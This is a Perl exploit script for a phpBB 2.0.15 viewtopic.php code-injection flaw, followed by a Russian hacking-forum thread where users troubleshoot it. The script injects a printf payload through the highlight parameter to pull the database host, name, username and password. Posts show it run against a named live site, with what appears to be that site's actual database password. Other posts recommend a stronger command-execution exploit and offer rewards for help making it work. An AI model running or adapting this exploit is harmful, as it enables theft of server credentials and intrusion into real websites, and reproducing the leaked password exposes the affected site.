#!/usr/bin/perl

# ************************************************** ************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# ************************************************** ************

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";

if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];

$serv =~ s/http:\/\///ge;
$delimit = "superloneEST";

$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";

print $sploit,"\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";

print "[+] Connecting OK\n";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";


$succes = 0;

while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}

close($sock);

if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}

/forum/viewtopic.php?t=1&highlight='.printf(superloneEST.$dbhost.superloneE ST.$d
bname.superloneEST.$dbuser.superloneEST.$dbpasswd. superloneEST).'
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host:
[+] Database Name:
[+] Username:
[+] Password:
вот такие пироги, в нужных местах пропуски :))

ребята, объясните как заставить это работать.


Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@xxxxx.xxx and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Apache/1.3.28 Server at www.xxxxx.xxx Port 80

Работает только на phpBB 2.0.15.


H:\temp>phpbb.pl boastology.com /forum/ 1266
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host: localhost
[+] Database Name: boast_phpbb1
[+] Username: boast_phpbb1
[+] Password: cLuTa5OpQx

Работает только на phpBB 2.0.15.


H:\temp>phpbb.pl boastology.com /forum/ 1266
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host: localhost
[+] Database Name: boast_phpbb1
[+] Username: boast_phpbb1
[+] Password: cLuTa5OpQx
а где же собака зарыта? :)
у мну всеравно пропуски.

Что делать с этим:
<code>
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host:
[+] Database Name:
[+] Username:
[+] Password:
</code>

Опять защита от ламеров?

бесполезный сплойт имхо под эту версию форумов есть сплойт удаленного исполнения команд это куда полезнее.

2stalles

URL http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.3.809-MSWin32-x86.msi
вот тее перл.
ленивый народ стал ёпть...

screen:

http://img305.imageshack.us/img305/4633/17zo.jpg



Вопрос: почему не коннектится ???

Аналогично это интересует и меня... Почему?!

Ну наверное прикрыли... да и Grrl говорит правду лучше бы сразу тем сплойтом бы пользовались..

млин что там править нужно что бы пустых строк не было, плз хоть в личку киньте. С меня плюсик будет

кто поможет, тому отдам семизнак и плюсы